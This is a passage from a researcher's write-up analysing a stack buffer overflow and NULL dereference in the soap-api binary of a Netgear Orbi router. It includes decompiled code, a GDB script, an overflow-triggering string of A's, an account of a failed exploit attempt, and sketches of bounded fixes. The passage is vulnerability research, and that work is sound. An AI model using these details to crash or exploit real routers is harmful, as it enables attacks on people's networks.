<p>The overflow occurs on line 48 in the decompiled code shown above as a result of the call to <code class="language-plaintext highlighter-rouge">sscanf()</code>. This line parses the SOAP method section from the server response content (<code class="language-plaintext highlighter-rouge">&lt;m:AAAAA[...]Response</code>) and writes it to the buffer <code class="language-plaintext highlighter-rouge">auStack236</code>, a fixed-size 64-byte stack buffer, without any length checks. At this point I felt pretty confident this was the crash I was seeing in the stack traces, so next I wanted to understand what paths led to this code being executed.</p>
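
<p>For contrast, here is a small sketch of the same kind of parse with an explicit field width. The names <code class="language-plaintext highlighter-rouge">parse_method</code> and <code class="language-plaintext highlighter-rouge">METHOD_BUF_LEN</code> are hypothetical and this is not the vendor’s code; the only point is that <code class="language-plaintext highlighter-rouge">%63s</code> makes <code class="language-plaintext highlighter-rouge">sscanf()</code> stop after 63 characters plus the null terminator, whereas a bare <code class="language-plaintext highlighter-rouge">%s</code> keeps writing until it hits whitespace.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;

#define METHOD_BUF_LEN 64

/* Hypothetical bounded variant of the parse (not the vendor's code).
 * "%63s" stores at most 63 characters plus the terminating null,
 * so out never receives more than METHOD_BUF_LEN bytes.
 * Returns 1 if the field was converted, 0 or EOF otherwise. */
int parse_method(const char *resp, char out[METHOD_BUF_LEN])
{
    return sscanf(resp, "&lt;m:%63s", out);
}
</code></pre></div></div>

<p>Because <code class="language-plaintext highlighter-rouge">%s</code> only stops at whitespace, the parsed value still carries the trailing <code class="language-plaintext highlighter-rouge">Response</code> suffix (for example <code class="language-plaintext highlighter-rouge">GetInfoResponse</code>), so any caller would still need to strip it afterwards.</p>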

<p>After reading through the code some more I realized almost every request eventually led to  <code class="language-plaintext highlighter-rouge">SendSoapResponse()</code> (I mean, duh, right?). In general, the flow always goes a little something like this:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">main()</code>
    <ul>
      <li>takes care of getting the SOAPAction header from an environment variable <code class="language-plaintext highlighter-rouge">SOAP_ACTION</code> or <code class="language-plaintext highlighter-rouge">HTTP_SOAPACTION</code> (set by the parent HTTP server (lighttpd) or the CGI handler (modcgi, procgi))</li>
      <li>handles parsing of the SOAP action and SOAP method parts from the header</li>
      <li>saves pointers to the start of each section in the buffer/PTR returned by <code class="language-plaintext highlighter-rouge">getenv()</code></li>
      <li>these ptrs are passed to <code class="language-plaintext highlighter-rouge">SoapExecute()</code></li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">SoapExecute()</code>
    <ul>
      <li>The main function that actually does handling of the various SOAP actions and methods</li>
      <li>Handles authentication checks</li>
      <li>Calls appropriate functions/etc based on submitted actions / method</li>
      <li>at the end of pretty much every case, it calls <code class="language-plaintext highlighter-rouge">SendSoapRespCode()</code>, passing the <code class="language-plaintext highlighter-rouge">soap_action</code> and <code class="language-plaintext highlighter-rouge">soap_method</code> pointers as arguments</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">SendSoapRespCode()</code>
    <ul>
      <li>Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was <code class="language-plaintext highlighter-rouge">Authenticate</code> or not</li>
      <li>The HTML/XML blob is then passed on to <code class="language-plaintext highlighter-rouge">SendSoapResponse()</code> along with the SOAPAction header value</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">SendSoapResponse()</code>
    <ul>
      <li>Here the response content is finalized and sent to the client</li>
    </ul>
  </li>
</ul>

<h3 id="live-debugging">live debugging</h3>

<p>At this point I felt pretty confident I was crashing <code class="language-plaintext highlighter-rouge">soap-api</code> from this buffer overflow so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run <code class="language-plaintext highlighter-rouge">soap-api</code>, I would have to debug on the device itself. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.</p>

<p>For each request that accesses SOAP functionality,  <code class="language-plaintext highlighter-rouge">lighttpd</code> forks and (something) eventually executes <code class="language-plaintext highlighter-rouge">soap-api</code> to handle this request. I initially had some trouble getting the debugger to catch when <code class="language-plaintext highlighter-rouge">soap-api</code> was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch <code class="language-plaintext highlighter-rouge">soap-api</code> early and then tell gdb to stay attached.</p>

<p>These were:</p>

<ul>
  <li>create break on <code class="language-plaintext highlighter-rouge">main()</code></li>
  <li><code class="language-plaintext highlighter-rouge">set follow-fork-mode child</code></li>
  <li><code class="language-plaintext highlighter-rouge">continue</code></li>
  <li>after sending a request, <code class="language-plaintext highlighter-rouge">lighttpd</code> forks and gdb attaches to <code class="language-plaintext highlighter-rouge">soap-api</code> and breaks on main()</li>
  <li><code class="language-plaintext highlighter-rouge">set follow-fork-mode parent</code> (to prevent new forks from taking over)</li>
  <li><code class="language-plaintext highlighter-rouge">continue</code></li>
</ul>

<p>This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces, and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up, insert a breakpoint on <code class="language-plaintext highlighter-rouge">sscanf()</code>, and catch signal 11. Each time the <code class="language-plaintext highlighter-rouge">sscanf</code> breakpoint is hit we print a backtrace, frame info, registers, and 10 words starting at the current stack pointer; on segfault we print the same backtrace, frame, and register info.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue
</code></pre></div></div>

<h3 id="lolwut-a-null-dereference">lolwut: a null dereference</h3>

<p>With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:</p>

<p><img src="/assets/images/orbi-nulldrf.png" alt="nullderef" /></p>

<p>This output seemed to indicate that:</p>

<ul>
  <li>The crash was happening in <code class="language-plaintext highlighter-rouge">strcmp</code> in <code class="language-plaintext highlighter-rouge">libc.so.1</code></li>
  <li>The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register <code class="language-plaintext highlighter-rouge">r0</code>, which is 0 at the time of the crash</li>
</ul>

<h2 id="deep-dive-sendsoapresponse">deep dive: SendSoapResponse()</h2>

<p>At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s <em>definitely</em> a buffer overflow, but that wasn’t what was causing the crash. I tried different payload lengths and values to see if they caused anything <em>other</em> than a null pointer deref but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.</p>

<h3 id="how-the-payload-reaches-sendsoapresponse">how the payload reaches SendSoapResponse()</h3>

<p>The SOAP action and method strings are initially parsed from the <code class="language-plaintext highlighter-rouge">SOAPAction</code> HTTP header in <code class="language-plaintext highlighter-rouge">main()</code> and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function <code class="language-plaintext highlighter-rouge">SendSoapRespCode()</code>. The code snippet below shows how the SOAP body string is constructed:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="kt">char</span> <span class="n">resp</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
  <span class="kt">char</span> <span class="o">*</span><span class="n">resp_fmt</span> <span class="o">=</span> <span class="s">"&lt;m:%sResponse xmlns:m=</span><span class="se">\"</span><span class="s">urn:NETGEAR-ROUTER:service:%s:1</span><span class="se">\"</span><span class="s">&gt;&lt;/m:%sResponse&gt;</span><span class="se">\r\n</span><span class="s">&lt;ResponseCode&gt;%03d&lt;/ResponseCode&gt;</span><span class="se">\r\n</span><span class="s">"</span><span class="p">;</span>
  <span class="n">snprintf</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="n">resp_fmt</span><span class="p">,</span> <span class="n">SOAP_METHOD</span><span class="p">,</span> <span class="n">SOAP_ACTION</span><span class="p">,</span> <span class="n">SOAP_METHOD</span><span class="p">,</span> <span class="n">response_code</span><span class="p">);</span>
</code></pre></div></div>

<p>Assuming a method “METHOD”, action “ACTION”, and response code 404, the resulting string would be:</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;m:METHODResponse</span> <span class="na">xmlns:m=</span><span class="s">"urn:NETGEAR-ROUTER:service:ACTION:1"</span><span class="nt">&gt;&lt;/m:METHODResponse&gt;</span>
<span class="nt">&lt;ResponseCode&gt;</span>404<span class="nt">&lt;/ResponseCode&gt;</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">snprintf()</code> will write at most 512 bytes (including the terminating null), and that limit can be reached while it is still expanding the first <code class="language-plaintext highlighter-rouge">%s</code> argument if the method string is long enough. When that happens nothing after that point in the format string is emitted and the output is truncated. For example, submitting a method string containing 500 A’s results in the following string:</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;m:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse</span>
</code></pre></div></div>
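
<p>The truncation is easy to reproduce off-device. The sketch below rebuilds the body with the same format string into a 512-byte buffer; <code class="language-plaintext highlighter-rouge">build_resp</code> and <code class="language-plaintext highlighter-rouge">resp_was_truncated</code> are hypothetical stand-ins I made up for illustration, not decompiled code. It relies on the fact that <code class="language-plaintext highlighter-rouge">snprintf()</code> returns the length the full string <em>would</em> have had, so a return value of 512 or more means the output was cut short.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;

#define RESP_LEN 512

/* Hypothetical stand-in for the body construction in SendSoapRespCode().
 * Returns what snprintf() returns: the length the full string would have had. */
int build_resp(char resp[RESP_LEN], const char *method, const char *action, int code)
{
    static const char fmt[] =
        "&lt;m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\"&gt;&lt;/m:%sResponse&gt;\r\n"
        "&lt;ResponseCode&gt;%03d&lt;/ResponseCode&gt;\r\n";

    return snprintf(resp, RESP_LEN, fmt, method, action, method, code);
}

/* Nonzero when the result did not fit in resp and was truncated. */
int resp_was_truncated(int snprintf_ret)
{
    return snprintf_ret &lt; 0 || snprintf_ret &gt;= RESP_LEN;
}
</code></pre></div></div>

<p>With a 500-character method the buffer ends right after the first <code class="language-plaintext highlighter-rouge">Response</code>, so it contains neither <code class="language-plaintext highlighter-rouge">service:</code> nor <code class="language-plaintext highlighter-rouge">&lt;ResponseCode&gt;</code>, and a plain <code class="language-plaintext highlighter-rouge">strstr()</code> lookup for either substring comes back NULL.</p>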

<h3 id="code-breakdown">code breakdown</h3>

<p>The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.</p>

<p><strong>Ghidra decompiler output:</strong></p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*1*/</span>      <span class="k">if</span> <span class="p">(</span><span class="n">is_soap_login</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*2*/</span>        <span class="n">local_jwt_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">cat_file</span><span class="p">(</span><span class="s">"/tmp/jwt_local"</span><span class="p">);</span>
<span class="cm">/*3*/</span>       <span class="n">fprintf</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span>
<span class="cm">/*4*/</span>                <span class="s">"HTTP/1.0 200 OK</span><span class="se">\r\n</span><span class="s">Content-Length: %d</span><span class="se">\r\n</span><span class="s">Content-Type: text/xml; charset=</span><span class="se">\"</span><span class="s">UTF-8</span><span class="se">\"\r\n</span><span class="s">S erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0</span><span class="se">\r\n</span><span class="s">Set-Cookie: jwt_local=%s</span><span class="se">\r\n\r\n</span><span class="s">"</span>
<span class="cm">/*5*/</span>                <span class="p">,</span><span class="n">total_content_len</span><span class="p">,</span><span class="n">local_jwt_ptr</span><span class="p">);</span>
<span class="cm">/*6*/</span>      <span class="p">}</span>
<span class="cm">/*7*/</span>      <span class="k">else</span> <span class="p">{</span>
<span class="cm">/*8*/</span>        <span class="n">fprintf</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span>
<span class="cm">/*9*/</span>                <span class="s">"HTTP/1.0 200 OK</span><span class="se">\r\n</span><span class="s">Content-Length: %d</span><span class="se">\r\n</span><span class="s">Content-Type: text/xml; charset=</span><span class="se">\"</span><span class="s">UTF-8</span><span class="se">\"\r\n</span><span class="s">S erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0</span><span class="se">\r\n\r\n</span><span class="s">"</span>
<span class="cm">/*10*/</span>                <span class="p">,</span><span class="n">total_content_len</span><span class="p">);</span>
<span class="cm">/*11*/</span>      <span class="p">}</span>
<span class="cm">/*12*/</span>      <span class="n">soap_log</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span>
<span class="cm">/*13*/</span>               <span class="s">"HTTP/1.0 200 OK</span><span class="se">\r\n</span><span class="s">Content-Length: %d</span><span class="se">\r\n</span><span class="s">Content-Type: text/xml; charset=</span><span class="se">\"</span><span class="s">UTF-8</span><span class="se">\"\r\n</span><span class="s">Se rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0</span><span class="se">\r\n</span><span class="s">"</span>
<span class="cm">/*14*/</span>               <span class="p">,</span><span class="n">total_content_len</span><span class="p">);</span>
<span class="cm">/*15*/</span>      <span class="n">fputs</span><span class="p">(</span><span class="n">s_</span><span class="o">&lt;?</span><span class="n">xml_version</span><span class="o">=</span><span class="s">"1.0"</span><span class="n">_encoding</span><span class="o">=</span><span class="s">"UT_000bd624,stream);</span><span class="err">
</span><span class="s">/*16*/      fputs(resp,stream);</span><span class="err">
</span><span class="s">/*17*/      fputs(s_&lt;/SOAP-ENV:Body&gt;_&lt;/SOAP-ENV:Enve_000bd6fc,stream);</span><span class="err">
</span><span class="s">/*18*/      soap_log(0,"</span><span class="o">%</span><span class="n">s</span><span class="o">%</span><span class="n">s</span><span class="o">%</span><span class="n">s</span><span class="s">",s_&lt;?xml_version="</span><span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="s">"_encoding="</span><span class="n">UT_000bd624</span><span class="p">,</span><span class="n">resp</span><span class="p">,</span>
<span class="cm">/*19*/</span>               <span class="n">s_</span><span class="o">&lt;/</span><span class="n">SOAP</span><span class="o">-</span><span class="n">ENV</span><span class="o">:</span><span class="n">Body</span><span class="o">&gt;</span><span class="n">_</span><span class="o">&lt;/</span><span class="n">SOAP</span><span class="o">-</span><span class="n">ENV</span><span class="o">:</span><span class="n">Enve_000bd6fc</span><span class="p">);</span>
<span class="cm">/*20*/</span>      <span class="n">fflush</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span>

<span class="cm">/*21*/</span>      <span class="k">if</span> <span class="p">((</span><span class="n">ext_mode</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
<span class="cm">/*22*/</span>         <span class="p">(</span><span class="n">total_content_len</span> <span class="o">=</span> <span class="n">config_invmatch</span><span class="p">(</span><span class="s">"installState"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">DAT_0008d1a0</span><span class="p">),</span> <span class="n">total_content_len</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">))</span> <span class="p">{</span>
<span class="cm">/*23*/</span>                        <span class="cm">/* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/</span>                            <span class="err">*/</span>
<span class="cm">/*25*/</span>        <span class="n">sscanf</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span><span class="s">"&lt;m:%sResponse%*s"</span><span class="p">,</span><span class="n">method_response_buf</span><span class="p">);</span>
<span class="cm">/*26*/</span>        <span class="n">strstr_Response_ret</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr_wrapper</span><span class="p">(</span><span class="n">method_response_buf</span><span class="p">,</span><span class="s">"Response"</span><span class="p">);</span>
<span class="cm">/*27*/</span>        <span class="k">if</span> <span class="p">(</span><span class="n">strstr_Response_ret</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*28*/</span>          <span class="o">*</span><span class="n">strstr_Response_ret</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
<span class="cm">/*29*/</span>        <span class="p">}</span>
<span class="cm">/*30*/</span>                        <span class="cm">/* POSSIBLE NULL DEREF, strstr_wrapper might return null */</span>
<span class="cm">/*31*/</span>        <span class="n">ptr_to_substrings_found</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr_wrapper</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span><span class="s">"service:"</span><span class="p">);</span>
<span class="cm">/*32*/</span>        <span class="n">sscanf</span><span class="p">(</span><span class="n">ptr_to_substrings_found</span><span class="p">,</span><span class="s">"service:%[^:]"</span><span class="p">,</span><span class="n">service_action_buf</span><span class="p">);</span>
<span class="cm">/*33*/</span>        <span class="n">ptr_to_substrings_found</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr_wrapper</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span><span class="s">"&lt;ResponseCode&gt;"</span><span class="p">);</span>
<span class="cm">/*34*/</span>        <span class="k">if</span> <span class="p">(</span><span class="n">ptr_to_substrings_found</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*35*/</span>          <span class="n">sscanf</span><span class="p">(</span><span class="n">ptr_to_substrings_found</span><span class="p">,</span><span class="s">"&lt;ResponseCode&gt;%[^&lt;]"</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_114</span><span class="p">);</span>
<span class="cm">/*36*/</span>        <span class="p">}</span>
<span class="cm">/*37*/</span>        <span class="n">vsnprintf_wrap</span><span class="p">(</span><span class="n">combined_action_method_str</span><span class="p">,</span><span class="mh">0x80</span><span class="p">,</span><span class="s">"%s:%s"</span><span class="p">,</span><span class="n">service_action_buf</span><span class="p">,</span><span class="n">method_response_buf</span><span class="p">);</span>
<span class="cm">/*38*/</span>        <span class="n">execve_wrapper_maybe</span>
<span class="cm">/*39*/</span>                  <span class="p">(</span><span class="s">"/dev/console"</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="s">"/usr/sbin/ra_installevent"</span><span class="p">,</span><span class="s">"soapresponse"</span><span class="p">,</span>
<span class="cm">/*40*/</span>                   <span class="n">combined_action_method_str</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_114</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
<span class="cm">/*41*/</span>        <span class="n">FUN_0001ae0c</span><span class="p">(</span><span class="s">"ra_install"</span><span class="p">,</span><span class="s">"method=%s, code=%s"</span><span class="p">,</span><span class="n">combined_action_method_str</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_114</span><span class="p">);</span>
<span class="cm">/*42*/</span>      <span class="p">}</span>
</code></pre></div></div>

<ul>
  <li><strong>Arguments:</strong>
    <ul>
      <li><code class="language-plaintext highlighter-rouge">FILE *stream</code>: filestream where response will be written (socket back to client?)</li>
      <li><code class="language-plaintext highlighter-rouge">char *resp</code>: a 512-byte buffer containing the body of the XML SOAP response constructed by the calling function (<code class="language-plaintext highlighter-rouge">DoSoapRespCode</code>)</li>
    </ul>
  </li>
  <li><strong>Lines 1-20</strong> in the snippet construct the response content and send it to the client by writing it to the file stream passed in as the first argument to <code class="language-plaintext highlighter-rouge">SendSoapResponse</code>
    <ul>
      <li>note: this is why the response is always sent, no matter what happens in the parsing code that follows</li>
    </ul>
  </li>
  <li><strong>Line 25:</strong> a call to <code class="language-plaintext highlighter-rouge">sscanf</code> to attempt to parse the SOAP method string
    <ul>
      <li>other functions up the call stack have parsed and placed the method string into an XML component in the <code class="language-plaintext highlighter-rouge">resp</code> argument passed to <code class="language-plaintext highlighter-rouge">SendSoapResponse</code></li>
      <li><code class="language-plaintext highlighter-rouge">sscanf</code> searches for the pattern <code class="language-plaintext highlighter-rouge">&lt;m:*Response*</code> and will parse the content between the colon up to the end of ‘Response’</li>
      <li><code class="language-plaintext highlighter-rouge">method_response_buf</code> is a static 64 byte buffer</li>
      <li>it’s possible to overflow this buffer if the string between <code class="language-plaintext highlighter-rouge">&lt;m:</code> and <code class="language-plaintext highlighter-rouge">Response*</code> is longer than 64 bytes, which appears to be achievable</li>
    </ul>
  </li>
  <li><strong>Line 26:</strong> a call to a <code class="language-plaintext highlighter-rouge">strstr</code> wrapper to check for the presence of the string “<code class="language-plaintext highlighter-rouge">Response</code>” in the data that was read into <code class="language-plaintext highlighter-rouge">method_response_buf</code> by <code class="language-plaintext highlighter-rouge">sscanf</code>
    <ul>
      <li>this wrapper first checks to make sure neither of the two arguments passed to it is NULL
        <ul>
          <li>if either of them is, it doesn’t call <code class="language-plaintext highlighter-rouge">strstr</code> and just returns a NULL pointer</li>
          <li>if they’re not, it calls <code class="language-plaintext highlighter-rouge">strstr</code> and then returns whatever <code class="language-plaintext highlighter-rouge">strstr</code> returned; <code class="language-plaintext highlighter-rouge">strstr</code> also returns NULL if the string is not found</li>
        </ul>
      </li>
      <li>If the submitted SOAP method has pushed the <code class="language-plaintext highlighter-rouge">Response</code> string entirely off the end of the XML buffer that is constructed, this returns NULL</li>
    </ul>
  </li>
  <li><strong>Lines 27-29:</strong> if the call to <code class="language-plaintext highlighter-rouge">strstr</code> did NOT return NULL (the <code class="language-plaintext highlighter-rouge">Response</code> string was found), set the first char of <code class="language-plaintext highlighter-rouge">Response</code> to a null byte
    <ul>
      <li>This null-terminates the string at that point, so functions that stop reading at the terminator see only the SOAP method and the <code class="language-plaintext highlighter-rouge">Response</code> suffix is cut off</li>
    </ul>
  </li>
  <li><strong>Line 31:</strong> another call to the <code class="language-plaintext highlighter-rouge">strstr</code> wrapper, this time searching the <code class="language-plaintext highlighter-rouge">resp</code> argument (the XML constructed by the calling function) for the string <code class="language-plaintext highlighter-rouge">"service:"</code>
    <ul>
      <li>there is no check after this to see if this returned NULL</li>
    </ul>
  </li>
  <li><strong>Line 32:</strong> second call to <code class="language-plaintext highlighter-rouge">sscanf</code> that attempts to parse the SOAP action string from the pattern <code class="language-plaintext highlighter-rouge">"service:*:"</code>, this time using the value returned by the call to <code class="language-plaintext highlighter-rouge">strstr</code> on the previous line as its source
    <ul>
      <li>since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition</li>
      <li>this only happens when the method string is long enough to have pushed the <code class="language-plaintext highlighter-rouge">"service:*:"</code> string off the end of the XML body buffer <code class="language-plaintext highlighter-rouge">resp</code></li>
    </ul>
  </li>
  <li><strong>Line 33:</strong> third call to the <code class="language-plaintext highlighter-rouge">strstr</code> wrapper, this time searching for the string <code class="language-plaintext highlighter-rouge">"&lt;ResponseCode&gt;"</code> in <code class="language-plaintext highlighter-rouge">resp</code></li>
  <li><strong>Lines 34-36:</strong> if the string was found by the call to <code class="language-plaintext highlighter-rouge">strstr</code> on the previous line, <code class="language-plaintext highlighter-rouge">sscanf</code> is used to parse out a substring similar to the previous calls; otherwise this is skipped.</li>
</ul>
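
<p>To make the missing check concrete, here is a minimal sketch of the pattern described above with the NULL check and a field width added. The names <code class="language-plaintext highlighter-rouge">strstr_checked</code> and <code class="language-plaintext highlighter-rouge">parse_service_action</code> are hypothetical, and the 32-byte destination size is an assumption for illustration, not something taken from the binary.</p>

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical re-creation of the NULL-safe strstr wrapper described above. */
char *strstr_checked(const char *haystack, const char *needle)
{
    if (haystack == NULL || needle == NULL)
        return NULL;
    return strstr(haystack, needle);
}

/*
 * Bounded, NULL-checked version of the "service:" parse.
 * Returns 0 on success, -1 if the marker is missing or nothing was parsed.
 * The 32-byte size of `out` is an assumption made for this sketch.
 */
int parse_service_action(const char *resp, char out[32])
{
    const char *p = strstr_checked(resp, "service:");
    if (p == NULL)
        return -1;  /* this is the check the decompiled code does not make */

    /* %31[^:] stops at the next ':' or after 31 bytes, whichever comes first */
    if (sscanf(p, "service:%31[^:]", out) != 1)
        return -1;
    return 0;
}
```

<p>With this shape, a response that has lost its <code class="language-plaintext highlighter-rouge">service:</code> marker produces an error return instead of a NULL pointer being handed to <code class="language-plaintext highlighter-rouge">sscanf</code>.</p>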

<h3 id="takeaways">takeaways</h3>

<p>After going through the code, I knew the following:</p>

<ol>
  <li>It is possible to overflow <code class="language-plaintext highlighter-rouge">method_response_buf</code>, the buffer the first call to <code class="language-plaintext highlighter-rouge">sscanf()</code> writes the method string to.</li>
  <li>It is possible to overflow <code class="language-plaintext highlighter-rouge">service_action_buf</code>, the buffer the second call to <code class="language-plaintext highlighter-rouge">sscanf()</code> writes the action string to.</li>
  <li>A NULL dereference will occur in the second call to <code class="language-plaintext highlighter-rouge">sscanf</code> if the string <code class="language-plaintext highlighter-rouge">'service:'</code> is not found in <code class="language-plaintext highlighter-rouge">resp</code>.
    <ol>
      <li>This will occur if the method string submitted is long enough to cause the SOAP action portion (<code class="language-plaintext highlighter-rouge">service:</code>) to be truncated from the final response data in <code class="language-plaintext highlighter-rouge">resp</code></li>
    </ol>
  </li>
</ol>

<p>Knowing this, it was clear why the payloads I was sending were causing the null dereference: the method strings were long enough to cause the <code class="language-plaintext highlighter-rouge">'service:'</code> string to be truncated from the end of <code class="language-plaintext highlighter-rouge">resp</code>. The <code class="language-plaintext highlighter-rouge">strstr()</code> call that checks for it then returns a null pointer, which is passed to <code class="language-plaintext highlighter-rouge">sscanf()</code> without being checked first.</p>
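
<p>The truncation case can be sketched in a few lines of C. This assumes the response is built with <code class="language-plaintext highlighter-rouge">snprintf</code> into a 512-byte buffer using the same format string as the replica code later in this post; the helper name <code class="language-plaintext highlighter-rouge">service_marker_survives</code> and the fixed <code class="language-plaintext highlighter-rouge">ConfigSync</code> action are made up for the example.</p>

```c
#include <stdio.h>
#include <string.h>

#define RESP_SIZE 512
/* Format string borrowed from the replica code; assumed to match the server. */
#define RESP_FMT "<m:%sResponse xmlns:m=\"urn:NETGEAR-ROUTER:service:%s:1\">" \
                 "</m:%sResponse>\r\n<ResponseCode>%03d</ResponseCode>\r\n"

/*
 * Builds the response the way the replica does and reports whether the
 * "service:" marker is still present after snprintf truncates to 512 bytes.
 * Returns 1 if the marker survives, 0 if strstr would return NULL.
 */
int service_marker_survives(const char *method)
{
    char resp[RESP_SIZE];

    /* snprintf never writes more than RESP_SIZE bytes, so a long method
     * string silently pushes everything after it out of the buffer */
    snprintf(resp, sizeof resp, RESP_FMT, method, "ConfigSync", method, 404);
    return strstr(resp, "service:") != NULL;
}
```

<p>A short method keeps the marker, a 600-byte run of <code class="language-plaintext highlighter-rouge">A</code>s loses it, and a long method that itself contains <code class="language-plaintext highlighter-rouge">service:</code> keeps it again. This only models truncation of the buffer as it is constructed, nothing that happens to it afterwards.</p>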

<h2 id="failed-exploit-attempt-1">(failed) exploit attempt #1</h2>

<p>The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:</p>

<ul>
  <li>the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)</li>
  <li>the final contents of <code class="language-plaintext highlighter-rouge">resp</code> must include the string <code class="language-plaintext highlighter-rouge">'service:'</code></li>
</ul>

<p>With this in mind, I went back and spent some time trying payloads I thought would avoid triggering the null dereference, but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for the service string would pass. I had tried putting it at both the beginning and the end of the payload string, but this still caused the null deref every time. I had been looking at this bug for a few days at this point and was pretty exhausted, so I called it and concluded that even though the buffer overflow was there, it was ‘unreachable’ due to the (incorrect) constraints I had in mind at the time. Honestly, I was just relieved to be done with it.</p>

<h2 id="exploit-viability-revisited">exploit viability, revisited</h2>

